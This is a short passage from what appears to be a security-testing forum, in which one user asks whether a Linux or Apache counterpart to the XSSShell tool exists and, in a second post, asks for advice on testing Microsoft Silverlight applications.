I've searched a while, but I was not able to find any project which brings XSSShell or something similar to Linux. Does anyone of you know a project which brings the power of XSSShell to Apache, Linux and BackTrack?
m-1-k-3
-
-
2:55
»
remote-exploit
Hey guys,
does any of you have any practice in testing MS Silverlight apps? Any links or some details would be very helpful.
thx
m-1-k-3